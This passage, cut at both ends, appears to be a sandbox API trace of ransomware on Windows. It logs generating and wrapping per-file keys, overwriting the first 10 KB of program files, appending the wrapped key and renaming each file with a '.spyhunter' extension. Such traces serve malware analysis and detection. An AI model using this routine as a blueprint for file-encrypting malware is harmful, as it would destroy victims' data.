Flags=0x8, Size=0x70) returned 0x31f098 [0120.967] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf900*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf900*=0x30) returned 1 [0120.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0120.968] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT") returned 97 [0120.968] StrStrW (lpFirst="CP1258.TXT", lpSrch=".txt") returned 0x0 [0120.968] GetProcessHeap () returned 0x2c0000 [0120.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0120.968] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8c4*=0x2522, lpOverlapped=0x0) returned 1 [0121.079] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffdade, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.080] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2522, lpNumberOfBytesWritten=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8c4*=0x2522, lpOverlapped=0x0) returned 1 [0121.080] GetProcessHeap () returned 0x2c0000 [0121.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0121.080] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.080] WriteFile (in: hFile=0x170, lpBuffer=0x25cf904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf904*, lpNumberOfBytesWritten=0x25cf8c4*=0x4, lpOverlapped=0x0) returned 1 [0121.080] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8c4*=0x30, lpOverlapped=0x0) returned 1 [0121.080] CloseHandle (hObject=0x170) returned 1 [0121.080] GetProcessHeap () returned 0x2c0000 [0121.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0121.080] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT.spyhunter") returned 107 [0121.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt.spyhunter")) returned 1 [0121.081] GetProcessHeap () returned 0x2c0000 [0121.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0121.081] GetProcessHeap () returned 0x2c0000 [0121.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0121.082] GetProcessHeap () returned 0x2c0000 [0121.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee36d0 | out: hHeap=0x2c0000) returned 1 [0121.082] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf908 | out: pbBuffer=0x25cf908) returned 1 [0121.082] GetProcessHeap () returned 0x2c0000 [0121.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0121.082] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf900*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf900*=0x30) returned 1 [0121.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0121.082] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT") returned 97 [0121.082] StrStrW (lpFirst="CP1257.TXT", lpSrch=".txt") returned 0x0 [0121.082] GetProcessHeap () returned 0x2c0000 [0121.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0121.083] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8c4*=0x252c, lpOverlapped=0x0) returned 1 [0121.349] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffdad4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.349] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x252c, lpNumberOfBytesWritten=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8c4*=0x252c, lpOverlapped=0x0) returned 1 [0121.349] GetProcessHeap () returned 0x2c0000 [0121.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0121.349] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.349] WriteFile (in: hFile=0x170, lpBuffer=0x25cf904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf904*, lpNumberOfBytesWritten=0x25cf8c4*=0x4, lpOverlapped=0x0) returned 1 [0121.349] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8c4*=0x30, lpOverlapped=0x0) returned 1 [0121.349] CloseHandle (hObject=0x170) returned 1 [0121.350] GetProcessHeap () returned 0x2c0000 [0121.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0121.350] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT.spyhunter") returned 107 [0121.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt.spyhunter")) returned 1 [0121.352] GetProcessHeap () returned 0x2c0000 [0121.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0121.352] GetProcessHeap () returned 0x2c0000 [0121.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0121.352] GetProcessHeap () returned 0x2c0000 [0121.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee35b8 | out: hHeap=0x2c0000) returned 1 [0121.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf900 | out: pbBuffer=0x25cf900) returned 1 [0121.353] GetProcessHeap () returned 0x2c0000 [0121.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0121.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8f8*=0x30) returned 1 [0121.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0121.353] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll") returned 75 [0121.353] StrStrW (lpFirst="AdobeExtractFiles.dll", lpSrch=".txt") returned 0x0 [0121.354] GetProcessHeap () returned 0x2c0000 [0121.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0121.354] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8bc*=0x2800, lpOverlapped=0x0) returned 1 [0121.464] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.464] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8bc*=0x2800, lpOverlapped=0x0) returned 1 [0121.464] GetProcessHeap () returned 0x2c0000 [0121.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0121.464] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.464] WriteFile (in: hFile=0x170, lpBuffer=0x25cf8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf8fc*, lpNumberOfBytesWritten=0x25cf8bc*=0x4, lpOverlapped=0x0) returned 1 [0121.649] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8bc*=0x30, lpOverlapped=0x0) returned 1 [0121.649] CloseHandle (hObject=0x170) returned 1 [0121.726] GetProcessHeap () returned 0x2c0000 [0121.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0121.727] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.spyhunter") returned 85 [0121.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll.spyhunter")) returned 1 [0121.728] GetProcessHeap () returned 0x2c0000 [0121.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0121.728] GetProcessHeap () returned 0x2c0000 [0121.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0121.728] GetProcessHeap () returned 0x2c0000 [0121.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66960 | out: hHeap=0x2c0000) returned 1 [0121.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8f8 | out: pbBuffer=0x25cf8f8) returned 1 [0121.730] GetProcessHeap () returned 0x2c0000 [0121.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0121.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8f0*=0x30) returned 1 [0121.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.794] GetProcessHeap () returned 0x2c0000 [0121.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0121.794] GetProcessHeap () returned 0x2c0000 [0121.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9a78 | out: hHeap=0x2c0000) returned 1 [0121.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8f0 | out: pbBuffer=0x25cf8f0) returned 1 [0121.796] GetProcessHeap () returned 0x2c0000 [0121.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0121.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8e8*=0x30) returned 1 [0121.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.881] GetProcessHeap () returned 0x2c0000 [0121.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0121.881] GetProcessHeap () returned 0x2c0000 [0121.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c618 | out: hHeap=0x2c0000) returned 1 [0121.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8e8 | out: pbBuffer=0x25cf8e8) returned 1 [0121.969] GetProcessHeap () returned 0x2c0000 [0121.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0121.969] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8e0*=0x30) returned 1 [0121.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0121.970] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store") returned 99 [0121.971] StrStrW (lpFirst="PipelineSegments.store", lpSrch=".txt") returned 0x0 [0121.971] GetProcessHeap () returned 0x2c0000 [0121.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0121.971] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8a4*=0x2800, lpOverlapped=0x0) returned 1 [0121.972] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.973] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8a4*=0x2800, lpOverlapped=0x0) returned 1 [0121.973] GetProcessHeap () returned 0x2c0000 [0121.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0121.973] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.973] WriteFile (in: hFile=0x120, lpBuffer=0x25cf8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf8e4*, lpNumberOfBytesWritten=0x25cf8a4*=0x4, lpOverlapped=0x0) returned 1 [0122.113] WriteFile (in: hFile=0x120, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8a4*=0x30, lpOverlapped=0x0) returned 1 [0122.113] CloseHandle (hObject=0x120) returned 1 [0122.113] GetProcessHeap () returned 0x2c0000 [0122.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7d00 [0122.113] wnsprintfW (in: pszDest=0x2eb7d00, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.spyhunter") returned 109 [0122.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store.spyhunter")) returned 1 [0122.114] GetProcessHeap () returned 0x2c0000 [0122.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7d00 | out: hHeap=0x2c0000) returned 1 [0122.114] GetProcessHeap () returned 0x2c0000 [0122.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.114] GetProcessHeap () returned 0x2c0000 [0122.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee36d0 | out: hHeap=0x2c0000) returned 1 [0122.114] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8e0 | out: pbBuffer=0x25cf8e0) returned 1 [0122.114] GetProcessHeap () returned 0x2c0000 [0122.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.115] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8d8*=0x30) returned 1 [0122.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.outlook.hostadapter.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.116] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll") returned 159 [0122.116] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll", lpSrch=".txt") returned 0x0 [0122.116] GetProcessHeap () returned 0x2c0000 [0122.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0122.116] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf89c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf89c*=0x2800, lpOverlapped=0x0) returned 1 [0122.238] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.238] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf89c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf89c*=0x2800, lpOverlapped=0x0) returned 1 [0122.238] GetProcessHeap () returned 0x2c0000 [0122.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0122.238] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.238] WriteFile (in: hFile=0x120, lpBuffer=0x25cf8dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf89c, lpOverlapped=0x0 | out: lpBuffer=0x25cf8dc*, lpNumberOfBytesWritten=0x25cf89c*=0x4, lpOverlapped=0x0) returned 1 [0122.433] WriteFile (in: hFile=0x120, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf89c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf89c*=0x30, lpOverlapped=0x0) returned 1 [0122.433] CloseHandle (hObject=0x120) returned 1 [0122.499] GetProcessHeap () returned 0x2c0000 [0122.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0122.499] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll.spyhunter") returned 169 [0122.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.outlook.hostadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.outlook.hostadapter.v10.0.dll.spyhunter")) returned 1 [0122.503] GetProcessHeap () returned 0x2c0000 [0122.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0122.503] GetProcessHeap () returned 0x2c0000 [0122.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.503] GetProcessHeap () returned 0x2c0000 [0122.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e93570 | out: hHeap=0x2c0000) returned 1 [0122.503] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8e0 | out: pbBuffer=0x25cf8e0) returned 1 [0122.503] GetProcessHeap () returned 0x2c0000 [0122.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.503] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8d8*=0x30) returned 1 [0122.503] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.504] GetProcessHeap () returned 0x2c0000 [0122.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.504] GetProcessHeap () returned 0x2c0000 [0122.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf560 | out: hHeap=0x2c0000) returned 1 [0122.504] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf8d8 | out: pbBuffer=0x25cf8d8) returned 1 [0122.504] GetProcessHeap () returned 0x2c0000 [0122.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.504] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf8d0*=0x30) returned 1 [0122.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 